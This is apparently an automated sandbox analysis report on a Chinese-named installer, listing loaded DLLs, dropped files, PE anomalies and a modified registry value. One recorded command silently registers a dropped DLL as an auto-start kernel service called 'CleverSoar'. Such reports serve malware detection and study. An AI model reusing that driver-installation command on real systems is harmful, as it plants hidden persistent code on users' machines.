Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic file information: File size 5707417 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000B.00000003.1738474598.0000000003440000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000B.00000003.1738614341.0000000003640000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.11.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00CF57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_00CF57D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: real checksum: 0x0 should be: 0x57517c
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.5.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: tProtect.dll.11.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: hrsw.vbc.5.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.4.drStatic PE information: section name: .didata
Source: 7zr.exe.5.drStatic PE information: section name: .sxdata
Source: is-9PU3N.tmp.5.drStatic PE information: section name: .xdata
Source: hrsw.vbc.5.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.5.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.5.drStatic PE information: section name: .=~
Source: update.vac.5.drStatic PE information: section name: .00cfg
Source: update.vac.5.drStatic PE information: section name: .voltbl
Source: update.vac.5.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7B86EB push ecx; ret 5_2_6C7B86FE
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C660F00 push ss; retn 0001h5_2_6C660F0A
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C886F10 push eax; ret 5_2_6C886F2E
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C7EB9F4 push 004AC35Ch; ret 5_2_6C7EBA0E
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 5_2_6C887290 push eax; ret 5_2_6C8872BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00C745F4 push 00D1C35Ch; ret 9_2_00C7460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D0FB10 push eax; ret 9_2_00D0FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00D0FE90 push eax; ret 9_2_00D0FEBE
Source: update.vac.1.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.5.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.5.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-9PU3N.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-361I0.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-361I0.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2LMM8.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-361I0.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
